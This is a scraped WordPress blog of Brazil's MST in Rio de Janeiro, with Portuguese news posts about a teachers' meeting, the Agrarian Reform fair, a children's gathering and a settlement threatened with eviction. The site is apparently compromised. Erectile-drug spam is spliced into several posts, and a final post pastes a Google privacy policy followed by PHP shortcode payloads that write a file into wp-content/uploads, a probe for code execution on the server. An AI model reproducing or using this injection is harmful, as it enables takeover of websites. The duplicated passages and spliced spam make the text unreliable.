Content

WordPress

2016-12-15

Professoras e professores realizam o I Encontro Estadual de Professores com o MST no Rio de Janeiro

2016-11-23
Professoras e professores, pedagogos, Acadêmicos e universitários, realizam o I Encontro Estadual de Professores com o MST no Rio de Janeiro / Foto Pablo Vergara Coletivo de Comunicação MST-RJ

Professoras e professores, pedagogos, Acadêmicos e universitários, realizam o I Encontro Estadual de Professores com o MST no Rio de Janeiro / Fotos Pablo Vergara / Coletivo de Comunicação MST-RJ tadalafil 20mg

Professoras e professores, pedagogos, Acadêmicos e universitários, realizam o I Encontro Estadual de Professores com o MST no Rio de Janeiro.

 por Pablo Vergara MST- RJ

Maracanã, Rio de Janeiro, 19/11/2016.

Aproximadamente 60 (sessenta) professores e professoras, acadêmicos e universitários de diversas Universidades federais, estaduais e Institutos (UFRJ, UFF, UFRRJ, UNIRIO, UERJ, IFFs e CEFETs), bem como de escolas estaduais da rede pública de ensino básico e entidades e organizações do Estado do Rio de Janeiro se reuniram no I Encontro Estadual de professoras e professores com o Movimento dos Trabalhadores Rurais Sem Terra, encontro que visa traçar projetos e ações em uma conjuntura desafiadora. Refletiu-se sobre os próximos passos do ensino em relação a Reforma Agrária e a educação do campo no Estado do Rio de Janeiro.O encontro foi realizado na Universidade Estadual do Rio de Janeiro UERJ. Nesta oportunidade, buscou-se enfocar a avaliação, o planejamento e a sistematização dos projetos, visando próximos programas de ensino ligados ao Movimento dos Trabalhadores Sem Terra no estado do Rio de Janeiro, principalmente a Escola Estadual Bernardo Marins Gomes – ESESF. A iniciativa procura tecer o programa pedagógico da escola, avançar na conformação de uma coordenação politico- pedagógica de forma a consolidar a participação de diversas instituições de ensino do estado do Rio de Janeiro no projeto.
A Atividade busca aprofundar e promover políticas públicas como o PRONERA e espaços de debate como a JURA (Jornadas Universitárias em Defesa da Reforma Agrária), EJA (Escola de Adultos e Jovens), Graduações e Licenciaturas, Mestrados, Extensões, Residência Jovem, Residência Agrária, Curso de Realidade Brasileira, Curso de Filosofia, Bibliotecas Populares nos assentamentos, Estagio Interdisciplinar de Vivencia. Enfim, experiências e espaços que foram inspirados no projeto político-pedagógico do MST.

Na Jornada também foi analisada a atual conjuntura nacional e internacional, os avanços do conservadorismo e a crise internacional da economia mundial, as quais interferem diretamente no sistema de governo local, perdendo a totalidade do controle politico. Esta decadência se soma a uma “crise de valores” afirma Marina dos Santos, dirigente nacional do movimento.

Esta decadência se soma a uma "crise de valores" afirma Marina dos Santos, dirigente nacional do movimento.

Esta decadência se soma a uma “crise de valores” afirma Marina dos Santos, dirigente nacional do movimento.

Este avanço do conservadorismo mundial e do sistema financeiro internacional esta ligado a uma crise de valores ideológicos, que trazem um forte individualismo, machismo e xenofobismo a nível mundial “Ha uma Hipnotização contra a política e as pessoas, o senso comum está cada vez mais reacionário” agrega, um fortalecimento da consciência do consumo irradiada pela hegemonia do mercado internacional que rapidamente se apropria de toda a cadeia de produção, terra, biosfera, insumos, sementes e químicos.

Na oportunidade também se manifestou a solidariedade com os movimentos sociais que estão sendo criminalizados, em repudio, como o fato que ocorreu no Paraná na operação Castra, que repercutiria mundialmente com a invasão da Policia Civil na Escola Nacional Florestan Fernandes.Dentro das diretrizes que foram citadas, extraímos 7 pontos importantes:1- Unidade na luta de classes, unidade da classe trabalhadora.2- Métodos coletivos de luta, gerar sujeitos coletivos.3- Reformas Estruturais, Reforma Agrária, Reforma Urbana.4- Comunicação Contra Hegemônica, fortalecer os coletivos de comunicação.5- Proteger os Bens da Natureza.6- Nova estratégia de ação, novas agendas de luta e poder politico.7- Lutar contra o estado de exceção, “FORA TEMER”, criar um frente de esquerda.

GT1 JURA, GT2 Cursos Formais, GT3 Formação de Base, Gt4 Cursos Livres e atividades de extensão.

GT1 JURA, GT2 Cursos Formais, GT3 Formação de Base, Gt4 Cursos Livres e atividades de extensão.

 

A jornada continuo durante o segundo modulo da tarde, na conformação de grupos de trabalho onde se sistematizaram temáticas sobre as: GT1 JURA, GT2 Cursos Formais, GT3 Formação de Base, Gt4 Cursos Livres e atividades de extensão.

Feira da Reforma Agrária chega ao Centro do Rio

2016-11-16

A feira que já virou tradição carioca acontece entre os dias 5 e 7 de dezembro, e promete trazer mais de 100 toneladas de alimentos este ano.

por Nívia Silva

Feira da Reforma Agrária acontecerá nos días 5,6 e 7 de dezembro no Largo da Carioca, Rio de Janeiro.

Feira da Reforma Agrária acontecerá nos días 5,6 e 7 de dezembro no Largo da Carioca, Rio de Janeiro. Foto : Pablo Vergara MST -RJ.

Entre os dias 05, 06 e 07 de dezembro será realizada a VIII Feira Estadual da Reforma Agrária Cícero Guedes, no Largo da Carioca, no Centro do Rio de Janeiro. Este é um evento de exposição e comercialização de produtos da agricultura familiar camponesa dos Assentamentos da Reforma Agrária, realizado pelo Movimento Sem Terra – MST e Instituto Nacional de Colonização e Reforma Agrária – INCRA. Durante os três dias serão comercializadas mais de 100 toneladas de alimentos, com variedades de produtos vindos de vários assentamentos da Reforma Agrária.

A diversidade dos alimentos oferecidos surpreende os que passam pela Feira: quantas vezes pensamos nas outras possibilidades de arroz para além do branco? A feira traz diversos tipos de arroz, suco de uva integral, frutas, polpas de frutas, feijão vermelho e de corda, sucos, legumes, verduras, produtos derivados de cana-de- açúcar (açúcar mascavo, melado, rapadura), ervas medicinal, fitoterápicos e fitocosméticos.

Produção de Fitoterápicos e Fitocosméticos entre outros. Foto:Pablo Vergara /MST - RJ

Produção de Fitoterápicos e Fitocosméticos entre outros. Foto:Pablo Vergara /MST – RJ.

A feira terá a participação de assentados/as de todo o estado do Rio de Janeiro e suas cooperativas, associações e grupos coletivos. A estimativa é que cerca de 120 agricultores do Rio de Janeiro e representações dos demais estados do Sudeste do Brasil estejam presentes na feira divulgando suas produções in natura e industrializadas das cooperativas de Reforma Agrária de diversos estados do Brasil.

A agroecologia é um dos princípios do movimento, por isso, parte da produção que vem dos assentamentos são agroecológicos. O trabalho que vem sendo construído é na perspectiva que os assentamentos do movimento façam a transição da agricultura convencional para a agroecológica, compreendendo que a agroecologia visa, sobretudo, garantir a segurança e a soberania alimentar dos agricultores e da sociedade.

Na programação encontramos Shows, Intervenções Culturais, Seminários e Oficinas com temas como: Agrotóxicos e Impactos na Saúde Humana e Soberania Alimentar, , Oficina produção de Fitoterápicos e Fitocosméticos entre outros.

História da Feira

A Feira foi batizada com o nome “Cícero Guedes” em 2013, em homenagem ao agricultor e militante do MST assassinado por pistoleiros no dia 25 de janeiro de 2013, nas proximidades da Usina Cambahyba, no Município de Campos dos Goytacazes (RJ). Além de uma grande liderança na luta pela Reforma Agrária, Cícero Guedes era considerado uma referência em conhecimento agroecológico, por conta das técnicas agrícolas sustentáveis que utilizava em seu lote no Assentamento Zumbi dos Palmares,  tendo sido também um importante colaborador de vários projetos de pesquisa e de extensão da Universidade Estadual do Norte Fluminense.

Feira Estadual da Reforma Agrária Cícero Guedes vira Lei 

A lei 59999/2015 de iniciativa do deputado Renato Cinco, “Reconhece como de interesse Cultural e Social para o Rio de Janeiro a Feira Estadual da Reforma Agrária Cícero Guedes. Portanto a feira nesta VII edição se tornou um evento oficial do município do Rio de Janeiro.

VIII Feira da Reforma Agrária Cícero guedes vira Lei 59.999 “Reconhece como de interesse Cultural e Social para o Rio de Janeiro a Feira Estadual da Reforma Agrária Cícero Guedes. Portanto a feira nesta VII edição se tornou um evento oficial do município do Rio de Janeiro.

VIII Feira da Reforma Agrária Cícero Guedes vira Lei 59.999 “Reconhece como de interesse Cultural e Social para o Rio de Janeiro a Feira Estadual da Reforma Agrária Cícero Guedes.”  Foto:Pablo Vergara / MST-RJ.

Região norte-fluminense organiza seu XIX Encontro Sem-terrinha

2016-11-15

A região norte-fluminense organiza seu XIX Encontro Sem-terrinha, com foco na educação como direito e na alimentação saudável.

por Pablo Vergara

Plenaria dos Sem Terrinha no Colégio Agrícola Antônio Sarlo, no Município de Campos dos Goytacazes. Foto: Setor de Educação MST RJ

Plenaria dos Sem Terrinha no Colégio Agrícola Antônio Sarlo, no Município de Campos dos Goytacazes. Foto: Setor de Educação MST RJ

 

Aproximadamente 120 crianças do Movimento dos Trabalhadores Rurais Sem-Terra, do Rio de Janeiro, de diversos assentamentos e acampamentos da Reforma Agrária da região norte- fluminense se reuniram durante o dia 12 de novembro no XIX Encontro Regional Sem- Terrinha. A atividade foi realizada no Colégio Agrícola Antônio Sarlo, no Município de Campos dos Goytacazes. valif vardenafil 20mg

Crianças pintam e brincam durante XIX encontro Sem Terrinha. Foto: Setor de Educação MST -RJ

Crianças pintam e brincam durante XIX encontro Sem Terrinha. Foto: Setor de Educação MST -RJ

O Encontro que busca trabalhar a pedagogia do movimento, de forma lúdica e com sua mística começou cedo ao ritmo da música “Somos Sem -Terrinha do MST, acordo todo dia para lutar você vai ver”, contando com muita energia da garotada e estudo nos espaços de formação. Teve também doação de livros, jogos e cirandas, além de apresentações culturais, que trabalharam a importância da alimentação saudável. O direito às escolas no campo também foi tema do encontro, entre cirandas e rodas.

Agradecemos aos apoios envolvidos nesta nova edição do encontro: PRO-Jovem, Saberes da terra, a direção do colégio Agrícola Antônio Sarlo e seus estudantes, Sindipetro-NF e Neru-UFF.

MST RJ realiza encontro Estadual em Macaé

2016-03-11

Foto credito: Pablo Vergara / MST RJ

De 4 a 6 de março, o Movimento Sem Terra do Rio de Janeiro esteve reunido em Macaé para realizar seu Encontro Estadual. Cerca de 80 militantes das regiões Norte, Sul, Baixada e região dos Lagos, além da capital, construíram juntos espaços de formação, debate e planejamento. O encontro ainda contou com parceiros do MST-RJ na região e de universidades do estado.

Para Elisângela Carvalho, “não são fáceis os desafios que estão postos e, mesmo com tantas adversidades, nos mantemos vivos, nos mantemos fortes. Não podemos perder a capacidade de combater todas as formas de injustiça. Todos nós aqui temos a tarefa de transformar a realidade do Rio de Janeiro”, reforça a dirigente nacional na mística de encerramento que celebra a nova direção estadual.

Em tempos tumultuados e de sérias ameaças à classe trabalhadora, garantir espaços de análise da conjuntura e de fortalecimento das lutas pela Reforma Agrária Popular no estado é renovar a esperança no poder do povo.

Veja as fotos do Coletivo de Comunicação MST-RJ

“Esse é o nosso país, essa é a nossa bandeira. É por amor a essa pátria Brasil que a gente segue em fileira. Queremos que abrace essa terra por ela quem sente paixão. Quem põe com carinho a semente pra alimentar a nação. Quem põe com carinho a semente pra alimentar a nação. Amarelos são os campos floridos, as faces agora rosadas se o branco da paz se irradia, vitória das mãos calejadas. Se o branco da paz se irradia, vitória das mãos calejadas” Zé Pinto

Começa amanhã a VII Feira Estadual da Reforma Agrária Cícero Guedes

2015-12-06

Produtos vindos direto de assentamentos de reforma agrária estarão disponíveis no centro do Rio entre segunda (7) e quarta (9).

Feira Estadual da Reforma Agrária - RJ.

De segunda até quarta desta semana, o Largo Carioca, no centro do Rio de Janeiro, será o palco da VII Feira Estadual da Reforma Agrária Cícero Guedes. Frutas, legumes e verduras vindas de assentamentos de reforma agrária do estado do Rio de Janeiro estarão à disposição do público que passar pelo local. O objetivo da feira é mostrar mostrar a urgência da reforma agrária, provando na prática que a justa divisão de terras tem um grande potencial de produção de alimentos saudáveis, cultivados de forma agroecológica.

Produtos agroindustrializados vindos assentamentos de outras regiões do Brasil também farão parte da feira, como por exemplo o suco de uva (RS), laticínios (SC) e a cachaça (SP). Durante o evento, acontecerão diversas apresentações culturais, como o bloco da Apafunk, o grupo de maracatu Tambores de Olokum e o forró de Geraldo Junior e o Bloco da Terreirada Cearense.

A feira também será um espaço de troca e aprendizado. Estão previstas quatro atividades de formação sobre experiências de comercialização e relação com consumidores, agrotóxicos, transgênico e seus impactos na saúde, impactos dos megaprojetos na agricultura familiar RJ, além de uma oficina de produção de fitocosméticos.

Confira a programação completa aqui: https://www.facebook.com/events/139157103110863/

E o site especial do evento: http://secretariamstrj.wix.com/feiraestadual

Contatos de imprensa:

Vanessa Ramos
(21) 99832-3219 (Vivo/WhatsApp)
(21) 98847-5561 (Oi)

 

Assentamento Osvaldo de Oliveira, em Macaé (RJ), é ameaçado de despejo

2015-11-20
Assentados do Osvaldo de Oliveira exibem diploma de alfabetização

Assentados do Osvaldo de Oliveira exibem diploma de alfabetização

21 meses após receberem a terra, famílias do assentamento Osvaldo de Oliveira, em Macaé (RJ), correm novamente risco de despejo. Depois de mais de 3 anos acampadas, sofrendo 4 remoções violentas, 78 famílias conquistaram o assentamento Osvaldo de Oliveira, com a imissão de posse da Fazenda Bom Jardim no dia 27 de fevereiro de 2014. No entanto, um processo de reintegração de posse tramita na 1º Vara Federal de Macaé, e caso seja aceito, pode significar o fim do primeiro Projeto de Desenvolvimento Sustentável (PDS) do estado do RJ.

O PDS é um tipo de assentamento de reforma agrária em que, desde sua origem, considera seu desenvolvimento baseado nos princípios da agroecologia. O pilar fundamental é a conservação e recuperação ambiental, aliada à produção de alimentos saudáveis para camponeses e consumidores.

Desde então, os moradores do assentamento vêm participando de feiras agroecológicas em Macaé e Rio das Ostras, e produzindo alimentos saudáveis para a região. As últimas duas feiras Estaduais da Reforma Agrária também contaram com a produção do Osvaldo de Oliveira. De forma contraditória, um dos argumentos do processo de despejo alega “falta de demanda de produtos agroecológicos” na região. Coupon for Levitra 20 mg

Pedimos a todos e todas as amigas do MST que assinem e divulguem o manifesto de apoio ao assentamento Osvaldo de Oliveira: http://www.peticaopublica.com.br/pview.aspx?pi=BR86554

Veja mais notícias sobre o assentamento Osvaldo de Oliveira:

MST prepara a 7a edição da Feira Estadual da Reforma Agrária Cícero Guedes

2015-11-18

V Feira Estadual da Reforma Agrária Cícero Guedes. Foto: Alan TygelNeste ano, o Movimento dos Trabalhadores Sem Terra (MST) realiza a 7ª edição da Feira Estadual da Reforma Agrária Cícero Guedes entre os dias 7 e 9 de dezembro, no Largo da Carioca, Centro do Rio de Janeiro. Mais de 70 toneladas de alimentos serão comercializadas, com variedades de produtos vindos de vários assentamentos de Reforma Agrária do estado do RJ e do Brasil. A Lei 5999/2015, de iniciativa do deputado Renato Cinco, reconheceu a Feira Estadual da Reforma Agrária Cícero Guedes como de interesse cultural e social para o Rio.

A diversidade dos alimentos oferecidos surpreende os que passam pela Feira: quantas vezes pensamos nas outras possibilidades de arroz para além do branco? Quem passar pela feira vai encontrar arroz e suco de uva integral, frutas, polpas de frutas, feijão vermelho e de corda, sucos, legumes, verduras, produtos derivados de cana-de-açúcar (açúcar mascavo, melado, cachaça), pimentas, ervas medicinais, artesanato e muito mais.

Acompanhe pelo Facebook: https://www.facebook.com/events/139157103110863/

Assentados e assentadas de todo o estado do Rio de Janeiro e suas cooperativas, associações e grupos coletivos participam da Feira. A estimativa é que cerca de 150 agricultores do Rio de Janeiro e representações dos demais estados do Sudeste do Brasil estejam presentes no evento, divulgando produções in natura e industrializados nas cooperativas de Reforma Agrária de diversos estados do Brasil.

Como a agroecologia é um dos princípios do movimento, grande parte da produção que vem dos assentamentos é agroecológica. Mas o MST ainda trabalha na perspectiva de que todos os assentamentos do movimento façam a transição da agricultura convencional para a agroecológica, compreendendo que a agroecologia visa, sobretudo, garantir a segurança e a soberania alimentar dos agricultores e da sociedade.

A feira contará ainda com a participação do Setor de Saúde do MST, que mostrará a produção de fitoterápicos, e cosméticos dos assentamentos. Quem vier ao Largo da Carioca encontrará também uma vasta programação com shows, intervenções culturais e oficinas de formação com temas como Agrotóxicos e Impactos na saúde humana.

História da Feira

Esta Feira foi batizada com o nome “Cícero Guedes” em 2013, em homenagem ao agricultor e militante do MST assassinado por pistoleiros no dia 25 de janeiro de 2013, nas proximidades da Usina Cambahyba, no Município de Campos dos Goytacazes (RJ).

Além de uma grande liderança na luta pela Reforma Agrária, Cícero Guedes era considerado uma referência em conhecimento agroecológico, por conta das técnicas agrícolas sustentáveis que utilizava em seu lote no Assentamento Zumbi dos Palmares,  tendo sido também um importante colaborador de vários projetos de pesquisa e de extensão da Universidade Estadual do Norte Fluminense.

Jovens do MST-RJ realizam encontro para debater perspectivas de futuro

2015-11-15

Hello world!

Tag: »

cialis viagra levitra prices Boletim 61

2015-10-21

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php] taking viagra levitra together